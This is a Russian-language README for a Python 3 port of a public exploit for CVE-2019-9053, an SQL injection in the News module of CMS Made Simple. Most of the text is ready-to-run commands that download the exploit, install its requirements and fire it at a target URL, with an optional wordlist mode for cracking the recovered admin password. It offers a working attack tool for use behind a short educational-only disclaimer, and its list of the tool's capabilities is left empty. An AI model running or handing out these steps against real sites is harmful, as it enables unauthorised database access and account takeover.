
CVE-2019-9053.
Это порт на Python 3 эксплойта CVE-2019-9053, который нацелен на версии CMS Made Simple (CMSMS) до 2.2.10. Уязвимость позволяет выполнить SQL-инъекцию через интерфейс модуля News.
Протестировано на TryHackMe Simple CTF Challenge.

Эксплойт использует уязвимость SQL-инъекции в модуле News CMS Made Simple. Он может:
Скачайте и запустите быстро с помощью этих команд:
# Download the exploit
curl -O https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/exploit.py
# Download requirements
curl -O https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/requirements.txt
# Install requirements
pip install -r requirements.txt
# Make exploit executable
chmod +x exploit.py
# Run the exploit
./exploit.py -u http://target.com/cms
Альтернатива с использованием wget:
wget https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/exploit.py
wget https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/requirements.txt
pip install -r requirements.txt
chmod +x exploit.py
./exploit.py -u http://target.com/cms
git clone https://github.com/del0x3/CVE-2019-9053-port-py3.git
cd CVE-2019-9053-port-py3
pip install -r requirements.txt
Базовое использование:
python3 exploit.py -u http://target.com/cms
С взломом пароля:
python3 exploit.py -u http://target.com/cms -c -w /path/to/wordlist.txt
-u, --url: Базовый URL цели (обязательно)-w, --wordlist: Путь к списку слов для взлома пароля-c, --crack: Включить режим взлома пароляЭтот инструмент предназначен только для образовательных целей и исследований в области безопасности. Не используйте его против систем без явного разрешения.
Лицензия MIT